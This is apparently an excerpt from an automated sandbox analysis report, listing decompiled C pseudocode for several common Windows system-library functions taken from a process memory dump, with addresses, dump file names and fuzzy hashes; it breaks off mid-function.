					while(1) {
						_t8 = _t64 + 8; // 0x77f05770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E048EFFB0(_t53, _t64, 0x49c8a6c);
						 *0x49cb1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E048F2280(_t45, 0x49c8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x49c5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E048EFFB0(_t51, _t64, 0x49c8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0491B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x04983d40
0x04983d48
0x04983d52
0x04983d59
0x04983d5d
0x04983d61
0x04983d63
0x04983d67
0x04983d69
0x04983d72
0x04983d76
0x04983d7a
0x04983d7f
0x04983d8b
0x04983d91
0x04983d91
0x04983d91
0x04983d94
0x04983d96
0x04983d9d
0x04983da1
0x04983db0
0x04983dba
0x04983dbc
0x04983dbc
0x04983dc6
0x04983dcb
0x04983dcf
0x04983dd1
0x04983dd4
0x00000000
0x00000000
0x04983dd9
0x04983e0c
0x04983e0c
0x04983e0f
0x04983ddb
0x04983ddb
0x04983de0
0x00000000
0x04983de2
0x04983de2
0x04983de4
0x04983de8
0x04983deb
0x04983df1
0x00000000
0x04983df3
0x04983df3
0x04983df5
0x04983df8
0x04983dfa
0x00000000
0x04983dfa
0x04983df1
0x04983de0
0x04983e11
0x04983e11
0x00000000
0x04983dfe
0x04983e04
0x04983e06
0x00000000
0x04983e06
0x00000000
0x04983e04
0x04983d91
0x04983e15
0x04983e1a
0x04983e1f
0x04983e1f
0x04983e23
0x04983e29
0x00000000
0x00000000
0x04983e2e
0x00000000
0x04983e30
0x04983e30
0x04983e35
0x00000000
0x04983e37
0x04983e3e
0x04983e42
0x04983e48
0x04983e4e
0x00000000
0x04983e4e
0x04983e35
0x00000000
0x04983e2e
0x04983e5b
0x04983e5c
0x04983e5d
0x04983e68
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ec388044ae0b90f2487edebb237301ea73191c95d3353b42c9907e1c20c5e52
Instruction ID: 2cb039270ea93d4848dfff310b9ab781f3dfe501d32413237101571989001626
Opcode Fuzzy Hash: 6ec388044ae0b90f2487edebb237301ea73191c95d3353b42c9907e1c20c5e52
Instruction Fuzzy Hash: 7F3168B1609302EFC720EF18D58485ABBE5FF85A15F05497EE8889B251D731FD04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0490A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0490A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x49c7b10; // 0x10
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x49c7b10 = 8;
					 *0x49c7b14 = 0x49c7b0c;
					 *0x49c7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x11
					E0490A990(0x49c7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0490A840(__edx, __ecx, __ecx, _t52, 0x49c7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x49c7b10; // 0x10
					_t3 = _t37 + 0x27; // 0x37
					__eflags = _t3 >> 5 -  *0x49c7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x49c7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x37
						_v8 = _t4 >> 5;
						_t50 = L048F4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x49c7b18 = _v8;
						_t8 = _t52 + 7; // 0x17
						E0491F3E0(_t50,  *0x49c7b14, _t8 >> 3);
						_t28 =  *0x49c7b14; // 0x77f07b0c
						__eflags = _t28 - 0x49c7b0c;
						if(_t28 != 0x49c7b0c) {
							L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x18
						 *0x49c7b14 = _t50;
						_t48 = _v12;
						 *0x49c7b10 = _t9;
						goto L6;
					}
					 *0x49c7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0490a713
0x0490a714
0x0490a717
0x0490a71d
0x0490a720
0x0490a722
0x0490a727
0x0490a74a
0x0490a754
0x0490a75e
0x0490a768
0x0490a76a
0x0490a773
0x0490a78b
0x0490a790
0x0490a792
0x0490a741
0x0490a741
0x0490a743
0x0490a749
0x0490a749
0x0490a732
0x0490a73a
0x0490a797
0x0490a79d
0x0490a7a3
0x0490a7a9
0x0490a7b6
0x0490a7bc
0x0490a7ca
0x0490a7e0
0x0490a7e2
0x0490a7e4
0x04949bf2
0x00000000
0x04949bf2
0x0490a7ed
0x0490a7f2
0x0490a800
0x0490a805
0x0490a80d
0x0490a812
0x04949c08
0x04949c08
0x0490a818
0x0490a81b
0x0490a821
0x0490a824
0x00000000
0x0490a824
0x0490a7ae
0x00000000
0x0490a7ae
0x0490a73c
0x0490a73e
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c93aac0bc162ecc46465ba93aff62d425d0f8f1f1a53e79a020879c82773180
Instruction ID: 8597298a24790e4e7a1f7243c5b63f9e04ab0d71961d47b58a3bd0a1d3156d8c
Opcode Fuzzy Hash: 8c93aac0bc162ecc46465ba93aff62d425d0f8f1f1a53e79a020879c82773180
Instruction Fuzzy Hash: C731AEB1A042069FD711CB98D880F6ABBF9EB95710F1489BAE015C7280D778BD01DFD2

Uniqueness

Uniqueness Score: -1.00%

Function 049061A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E049061A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04905E50(0x48b67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E049A9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E048DF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x049061b3
0x049061b5
0x049061bd
0x049061c3
0x049061c7
0x049061d2
0x049061ff
0x049061ff
0x04906201
0x04906207
0x04906207
0x049061d4
0x049061d9
0x00000000
0x00000000
0x049061df
0x049061e2
0x00000000
0x00000000
0x049061e6
0x049061e8
0x049061ee
0x049061ee
0x049061f9
0x0494762f
0x04947632
0x04947635
0x04947639
0x04947640
0x0494766e
0x04947675
0x00000000
0x00000000
0x04947681
0x04947689
0x0494768d
0x04947691
0x04947695
0x04947699
0x049476af
0x049476b5
0x049476b7
0x049476b7
0x049476d7
0x049476dc
0x00000000
0x049476dc
0x049476a2
0x049476a9
0x04947651
0x04947653
0x04947653
0x04947656
0x04947656
0x00000000
0x04947656
0x04947644
0x04947646
0x04947648
0x04947648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aed2ad691004b44ec4d48f39ead94e27981c718e66d2b104513bbab4825b19a4
Instruction ID: 9d1ce07c0a928feb33a98571471b74b4fc309450d98097c2b20d64d0b597768d
Opcode Fuzzy Hash: aed2ad691004b44ec4d48f39ead94e27981c718e66d2b104513bbab4825b19a4
Instruction Fuzzy Hash: FD3159716057019FD3A0DF59C804F26B7EAAB88B00F0589BDA99497291E7B0F8048B92

Uniqueness

Uniqueness Score: -1.00%

Function 048DAA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E048DAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x49cd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x49c7b9c; // 0x0
					_t53 = L048F4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0491B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0491F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L048E6C59(_t53, _t51, _t58) != 0) {
							_t28 = E04905E50(0x48bc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0490B230(_v32, _v28, 0x48bc2d8, 1,  &_v24);
								_t28 = E048DF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x048daa25
0x048daa29
0x048daa2d
0x048daa30
0x048daa37
0x048daa3c
0x04934458
0x04934458
0x04934472
0x04934474
0x04934476
0x048daa64
0x048daa74
0x0493447c
0x04934483
0x04934492
0x048daa52
0x048daa54
0x048daa5e
0x049344a8
0x049344ad
0x049344af
0x049344b6
0x049344b6
0x049344b9
0x049344bc
0x049344cd
0x049344d3
0x049344d6
0x049344e1
0x049344e1
0x049344e6
0x049344e8
0x049344fb
0x049344fb
0x049344e8
0x00000000
0x048daa5e
0x04934476
0x048daa42
0x048daa46
0x048daa48
0x048daa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7386ac7539233eba73d3f55e7ffdcb86fc265a4a21fa022195b342798c9fde2
Instruction ID: b40a91fd04d46e228800ebfec5068b667d71d7624bf23e23bec7a591f4335556
Opcode Fuzzy Hash: d7386ac7539233eba73d3f55e7ffdcb86fc265a4a21fa022195b342798c9fde2
Instruction Fuzzy Hash: 62312171A00219ABDF149F68CD41ABFB3B8EF44704F014579F901E7240E778B950DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04918EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04918EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x49cd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04904E70(0x49c86e4, 0x4919490, 0, 0);
					if( *0x49c53e8 > 5 && E04918F33(0x49c53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x49c53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x49c53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x48bbc46;
						_t48 = E04957B9C(0x49c53e8, 0x48bbc46, _t67, 0x49c53e8, _t70,  &_v140);
					}
				}
				return E0491B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x04918ec7
0x04918ed9
0x04918edc
0x04918ee6
0x04918ee9
0x04918eee
0x04918efc
0x04918f08
0x04951349
0x04951353
0x0495135d
0x04951366
0x0495136f
0x04951375
0x0495137c
0x04951385
0x04951390
0x04951391
0x0495139c
0x0495139d
0x049513a6
0x049513ac
0x049513b2
0x049513b5
0x049513bc
0x049513bf
0x049513c2
0x049513c5
0x049513c8
0x049513cb
0x049513ce
0x049513d1
0x049513d4
0x049513d7
0x049513da
0x049513dd
0x049513e0
0x049513e3
0x049513e6
0x049513e9
0x049513f6
0x04951400
0x04951400
0x04918f08
0x04918f32

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6e33e08df61d5b8e2b0a0d9ca7c951f9e24a9d9d905069b8023fc43127e8f7
Instruction ID: e2cdbf87b09ada311d76aa8209c91e192af199f6e9a715ea06f74d2841f2ca16
Opcode Fuzzy Hash: 9f6e33e08df61d5b8e2b0a0d9ca7c951f9e24a9d9d905069b8023fc43127e8f7
Instruction Fuzzy Hash: 9C4191B1D002189EDB10DFAAD981AADFBF5FB48314F5081BEE549A7240D774AA44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04914A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04914A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x49cd360 ^ _t62;
				_v8 =  *0x49cd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E048F2280(_t26, 0x49c8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E048EFFB0(_t41, _t51, 0x49c8608);
						L2:
						 *0x49cb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0491B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E048F2280(_t28, 0x49c8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E048EFFB0(_t42, _t53, 0x49c8608);
							if(_t53 != 0) {
								L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E048EFFB0(_t41, _t51, 0x49c8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x04914a2c
0x04914a34
0x04914a3c
0x04914a3e
0x04914a48
0x04914a4b
0x04914a4d
0x04914a51
0x04914a9c
0x00000000
0x00000000
0x04914aa3
0x04914aa8
0x04914aad
0x04914ab1
0x04914ade
0x04914ae3
0x04914a5a
0x04914a62
0x04914a6a
0x04914a6e
0x0494f203
0x04914a84
0x04914a88
0x04914a89
0x04914a8a
0x04914a95
0x04914a95
0x04914a79
0x04914a80
0x04914af2
0x04914af4
0x04914af9
0x04914aff
0x04914b01
0x04914b03
0x04914b08
0x0494f20a
0x0494f212
0x0494f216
0x0494f216
0x04914b08
0x04914b13
0x04914b1a
0x0494f229
0x0494f229
0x04914b1a
0x04914a82
0x00000000
0x04914a82
0x04914ab7
0x04914acd
0x04914acd
0x04914ad5
0x04914ada
0x00000000
0x04914ada
0x04914ac2
0x04914acb
0x00000000
0x00000000
0x00000000
0x04914acb
0x04914a53
0x04914a53
0x04914a58
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75059ccbb9e1e2ee5888bb51464220758f99c2ebc19b642e9982e58804542e52
Instruction ID: 76fba4e4bdbb5d6e10e396626e832e425a90671fdbbc53d16d1053093662a63d
Opcode Fuzzy Hash: 75059ccbb9e1e2ee5888bb51464220758f99c2ebc19b642e9982e58804542e52
Instruction Fuzzy Hash: 2E3146322053159FD721EF58C940B2ABBA9FFC9715F41093EE9124B260DBB0F800CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0490E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0490E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04919670() < 0) {
					L0492DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x49c7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L048F4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0490E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0490e730
0x0490e736
0x0490e738
0x0490e73d
0x0490e73e
0x0490e740
0x0490e749
0x0490e765
0x0490e76a
0x0490e76b
0x0490e76c
0x0490e76d
0x0490e76e
0x0490e76f
0x0490e775
0x0490e777
0x0490e77e
0x0494b675
0x0490e784
0x0490e784
0x0490e789
0x0490e7a8
0x0490e7ac
0x0490e807
0x0490e7ae
0x0490e7ae
0x0490e7b1
0x0490e7b4
0x0490e7b9
0x0490e7c0
0x0490e7c4
0x0490e7ca
0x0490e7cc
0x00000000
0x0490e7d3
0x0490e7d6
0x00000000
0x00000000
0x0490e7ff
0x0490e802
0x00000000
0x00000000
0x0490e7f9
0x0490e7fc
0x00000000
0x00000000
0x0490e7f3
0x0490e7f6
0x00000000
0x00000000
0x0490e7ed
0x0490e7f0
0x00000000
0x00000000
0x0490e7e7
0x0490e7ea
0x00000000
0x00000000
0x0494b685
0x0494b688
0x00000000
0x00000000
0x0494b682
0x00000000
0x00000000
0x0490e7cc
0x0490e7d9
0x0490e7dc
0x0490e7de
0x0490e7de
0x0490e7ac
0x0490e7e4
0x0490e74b
0x0490e751
0x0490e759
0x0490e761
0x0490e761

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca873a9be3f10edcfd318b74ac49c0d318326a6ea1d17c74911dfbcb11f7b35b
Instruction ID: 15e08dfb9b6f7f4b91f161855784b11b08eabab195444609968054e54bfce204
Opcode Fuzzy Hash: ca873a9be3f10edcfd318b74ac49c0d318326a6ea1d17c74911dfbcb11f7b35b
Instruction Fuzzy Hash: E5318C75A14249EFEB44CF58C840B9ABBE8FB58314F148666F904CB381E671FD80CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0490BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0490BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x49c6100; // 0x42
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E048F2280(0xd, 0x170df1a0);
				_t41 =  *0x49c60f8; // 0x0
				if(_t41 != 0) {
					 *0x49c60f8 =  *_t41;
					 *0x49c60fc =  *0x49c60fc + 0xffff;
				}
				E048EFFB0(_t41, 0x800, 0x170df1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x49c60f0], ax");
